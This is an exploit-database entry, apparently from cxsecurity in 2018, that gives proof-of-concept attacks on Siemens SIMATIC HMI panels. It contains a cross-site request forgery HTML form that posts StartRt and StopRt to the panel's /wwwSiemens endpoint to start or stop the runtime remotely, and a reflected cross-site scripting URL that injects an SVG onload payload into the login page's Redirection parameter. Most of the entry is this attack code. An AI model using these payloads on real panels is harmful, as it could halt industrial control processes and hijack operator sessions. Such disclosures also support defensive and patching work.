Siemens SIMATIC Panels Cross Site Request Forgery / Cross Site Scripting

2018-05-19 / 2018-05-22
hk t4rkd3vilz (HK) hk
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Siemens SIMATIC Panels Multiple Vulnerability # Date: 18.05.2018 # Exploit Author: t4rkd3vilz # Vendor Homepage: http://www.siemens.com/ # Version: Multiple SIMATIC Panels (TP, OP, MP, Mobile, Comfort) # Greetz: Jameel Nabbo CSRF PoC <FORM METHOD="POST" ACTION="http://TargetIP/wwwSiemens <http://targetip/wwwSiemens>"> <TD> <INPUT TYPE="submit" VALUE="Start runtime" class="ad_button"> </TD> <TD> <INPUT TYPE="hidden" NAME="StartRt"> </TD> </FORM> </tr> <tr> <FORM METHOD="POST" ACTION="/wwwSiemens"> <TD> <INPUT TYPE="submit" VALUE="Stop runtime" class="ad_button"> </TD> <TD> <INPUT TYPE="hidden" NAME="StopRt"> </TD> </FORM> And XSS PoC http://TargetIP/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection= <http://targetip/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection=>"/><svg/onload=prompt(/XSS/)>


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top